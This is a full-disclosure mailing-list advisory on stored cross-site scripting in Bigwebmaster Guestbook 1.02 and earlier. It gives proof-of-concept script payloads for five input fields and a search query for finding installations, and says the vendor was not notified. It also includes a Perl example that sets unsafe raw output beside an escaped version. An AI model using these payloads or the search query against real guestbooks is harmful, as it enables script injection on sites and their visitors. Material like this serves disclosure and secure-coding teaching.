[Full-disclosure] bigwebmaster guestbook multiply XSS
Affected software:
Bigwebmaster Guestbook version 1.02 and down
Vendor:
http://www.bigwebmaster.com/Perl/Scripts_and_Programs/Guestbooks/
Introduction:
(taken from vendor site)
This is one of the most powerful guestbooks that you will find on the
internet. Visitors who come to your site will be able to leave comments
and other general information about themselves. If you want to know what
your visitors are thinking, and if you want a fully customizable script,
this one is perfect for you. Features include template files to fit any
website design, 9 standard fields, 9 extra fields (customizable),
unlimited entries, and easy to use admin area. Full online demo available.


Vulnerability Details:
When a comment is added, addguest.cgi accepts JavaScript code in the mail, site, city, state and country fields, which leads to cross-site scripting (the stored script runs in visitors' browsers) when viewguest.cgi is accessed to display the guest book's content.

POC:
http://www.example.com/gb/addguest.cgi
name: xss
mail: xss@xxxxxxxxxxx <script>alert('XSS in mail');</script>
site: http://www.example.com/ <script>alert('XSS in site');</script>
city: <script>alert('XSS in city');</script>
state: <script>alert('XSS in state');</script>
country: <script>alert('XSS in country');</script>
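To show the defect and its fix side by side, here is an added example (not code from the Bigwebmaster Guestbook, whose source is not on this page): a small stand-in for the rendering step of viewguest.cgi, with a constructed stored entry carrying the PoC payloads above, a hypothetical template fragment, and the raw substitution beside an output-escaping version. The field names, template syntax and helper subs are assumptions.

```perl
# Added example (not the guestbook's own code): a stand-in for the
# viewguest.cgi rendering step, unsafe pattern beside a hardened one.
use strict;
use warnings;
# Constructed stored entry, mirroring the PoC fields submitted via addguest.cgi.
my %entry = (
    name    => 'xss',
    mail    => 'xss@example.invalid <script>alert(1);</script>',
    site    => 'http://www.example.com/ <script>alert(1);</script>',
    city    => '<script>alert(1);</script>',
    state   => 'CA',
    country => 'US',
);

# Hypothetical template fragment in the style of the script's template files.
my $template = '<p><b>%name%</b> (<a href="mailto:%mail%">%mail%</a>) from '
             . '%city%, %state%, %country% - <a href="%site%">%site%</a></p>';

# UNSAFE: raw substitution, so a stored <script> reaches every visitor's browser.
sub render_unsafe {
    my ($tpl, $e) = @_;
    $tpl =~ s/%(\w+)%/$e->{$1}/g;
    return $tpl;
}

# Encode the five characters that matter in HTML text and attribute values.
sub html_escape {
    my $s = shift;
    $s =~ s/&/&amp;/g; $s =~ s/</&lt;/g;  $s =~ s/>/&gt;/g;
    $s =~ s/"/&quot;/g; $s =~ s/'/&#39;/g;
    return $s;
}

# Keep only http(s) URLs in the site field so "javascript:" links are dropped.
sub safe_url {
    my $u = shift;
    return $u =~ m{\Ahttps?://[^\s"'<>]+\z} ? $u : '';
}

# HARDENED: validate the URL field, then escape every field at output time.
sub render_safe {
    my ($tpl, $e) = @_;
    my %clean = %$e;
    $clean{site} = safe_url($clean{site});
    $tpl =~ s{%(\w+)%}{html_escape($clean{$1} // '')}ge;
    return $tpl;
}
print render_unsafe($template, \%entry), "\n";   # script tags survive
print render_safe($template, \%entry), "\n";     # rendered as inert text
```

The same escaping must be applied to every stored field at the point it is written into HTML, not only to the five named in the advisory, since any field that reaches the template is an output sink.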

google search:
intitle:Big Webmaster Guestbook

Vendor Status:
NOT NOTIFIED

Solution:
I DON'T CARE

Javor Ninov aka DrFrancky
http://www.securitydot.net/


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/